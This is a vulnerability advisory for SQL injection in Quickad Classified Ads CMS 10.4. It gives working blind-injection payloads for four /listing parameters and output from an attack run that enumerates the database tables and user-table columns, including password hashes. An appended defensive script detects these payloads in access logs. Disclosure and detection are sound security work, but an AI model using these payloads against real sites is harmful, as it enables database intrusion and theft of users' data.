C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : https://bylancer.com/
Vendor    : Bylancer
Software  : Quickad Classified Ads CMS 10.4
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
═════════════

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09

    CryptoJob (Twitter) twitter.com/0x0CryptoJob

© CraCkEr 2023

Path: /listing

https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=

https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]

GET parameter 'range1' is vulnerable to SQL Injection

---
Parameter: range1 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1
---

GET parameter 'range2' is vulnerable to SQL Injection

---
Parameter: range2 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy
---

GET parameter 'placeid' is vulnerable to SQL Injection

---
Parameter: placeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=
---

GET parameter 'keywords' is vulnerable to SQL Injection

---
Parameter: keywords (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1
---

[+] Starting the Attack

fetching current database
current database: 'classified_******'

fetching tables

[53 tables]
+---------------------------+
| ad_custom_fields          |
| ad_product                |
| pro_admins                |
| pro_adsense               |
| pro_balance               |
| pro_blog                  |
| pro_blog_cat_relation     |
| pro_blog_categories       |
| pro_blog_comment          |
| pro_catagory_main         |
| pro_catagory_sub          |
| pro_category_translation  |
| pro_cities                |
| pro_countries             |
| pro_currencies            |
| pro_custom_data           |
| pro_custom_fields         |
| pro_custom_options        |
| pro_emailq                |
| pro_faq_entries           |
| pro_favads                |
| pro_firebase_device_token |
| pro_languages             |
| pro_login_attempts        |
| pro_logs                  |
| pro_messages              |
| pro_mobile_numbers        |
| pro_notification          |
| pro_options               |
| pro_pages                 |
| pro_payments              |
| pro_plan_options          |
| pro_plans                 |
| pro_product               |
| pro_product_resubmit      |
| pro_push_notification     |
| pro_qbm_banners           |
| pro_qbm_log               |
| pro_qbm_options           |
| pro_qbm_transactions      |
| pro_qbm_types             |
| pro_reviews               |
| pro_subadmin1             |
| pro_subadmin2             |
| pro_subscriptions         |
| pro_taxes                 |
| pro_testimonials          |
| pro_time_zones            |
| pro_transaction           |
| pro_upgrades              |
| pro_user                  |
| pro_user_options          |
| pro_usergroups            |
+---------------------------+

fetching columns from Table 'pro_user'

[36 columns]
+----------------+----------------------------------------+
| Column         | Type                                   |
+----------------+----------------------------------------+
| description    | text                                   |
| name           | varchar(225)                           |
| status         | enum('0','1','2')                      |
| view           | int(11)                                |
| address        | varchar(255)                           |
| city           | varchar(225)                           |
| confirm        | varchar(255)                           |
| country        | varchar(50)                            |
| created_at     | datetime                               |
| email          | varchar(255)                           |
| facebook       | varchar(255)                           |
| forgot         | varchar(255)                           |
| googleplus     | varchar(255)                           |
| group_id       | int(11)                                |
| id             | int(11)                                |
| image          | varchar(225)                           |
| instagram      | varchar(255)                           |
| lastactive     | datetime                               |
| linkedin       | varchar(255)                           |
| notify         | enum('0','1')                          |
| notify_cat     | varchar(255)                           |
| oauth_link     | varchar(255)                           |
| oauth_provider | enum('','facebook','google','twitter') |
| oauth_uid      | varchar(100)                           |
| online         | enum('0','1')                          |
| password_hash  | varchar(255)                           |
| phone          | varchar(255)                           |
| postcode       | varchar(255)                           |
| sex            | enum('Male','Female','Other')          |
| tagline        | varchar(255)                           |
| twitter        | varchar(255)                           |
| updated_at     | datetime                               |
| user_type      | enum('user','seller')                  |
| username       | varchar(255)                           |
| website        | varchar(255)                           |
| youtube        | varchar(255)                           |
+----------------+----------------------------------------+

[-] Done
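
Added example (not part of the original advisory and not Quickad's own code): a log audit a defender could run to find /listing requests whose placeid, range1, range2 or keywords values look like the payloads reported above. The numeric-only rule for the first three parameters, the keyword heuristic and the log lines themselves are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory reports as injectable on /listing.
NUMERIC_PARAMS = ("placeid", "range1", "range2")  # assumption: digits or empty
TEXT_PARAMS = ("keywords",)                       # free text: heuristics only
# Assumed heuristic: SQL syntax that has no place in a search keyword.
SQL_HINT = re.compile(r"(?i)\b(?:sleep|benchmark)\s*\(|\bselect\b.+\bfrom\b|'\s*(?:xor|or|and)\b")
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed log lines; the payloads are URL-encoded forms of those quoted in the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /listing?keywords=bike'
    '&location=Beirut&placeid=276781&range1=10&range2=500 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2023:10:01:00 +0000] "GET /listing?keywords=&placeid=276781'
    '&range1=1%20AND%20(SELECT%203133%20FROM%20(SELECT(SLEEP(5)))crfu)&range2=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2023:10:02:00 +0000] "GET /listing?location=Beirut&placetype=city'
    '&placeid=276781%27)%20AND%203510=3510%20AND%20(%27DiTr%27=%27DiTr&keywords= HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2023:10:03:00 +0000] "GET /listing?location=Beirut&placeid=276781'
    '&keywords=1%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z&cat=1 HTTP/1.1" 200 5120',
]

def audit_listing_request(target):
    """Return the sorted names of /listing parameters whose values look injected."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/listing":
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    flagged = set()
    for name in NUMERIC_PARAMS:
        # Anything other than digits (or an empty value) is out of contract.
        if any(not re.fullmatch(r"\d*", v.strip()) for v in params.get(name, [])):
            flagged.add(name)
    for name in TEXT_PARAMS:
        if any(SQL_HINT.search(v) for v in params.get(name, [])):
            flagged.add(name)
    return sorted(flagged)

def audit_log(lines):
    """Return (line_number, flagged_params) for each suspicious /listing request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        flagged = audit_listing_request(match.group(1)) if match else []
        if flagged:
            hits.append((number, flagged))
    return hits

if __name__ == "__main__":
    print(audit_log(SAMPLE_LOG))
```

The same digits-only rule applied server-side (integer casting for placeid, range1 and range2, and a bound query parameter for keywords) is what removes the injection; the log audit only shows where it has been attempted.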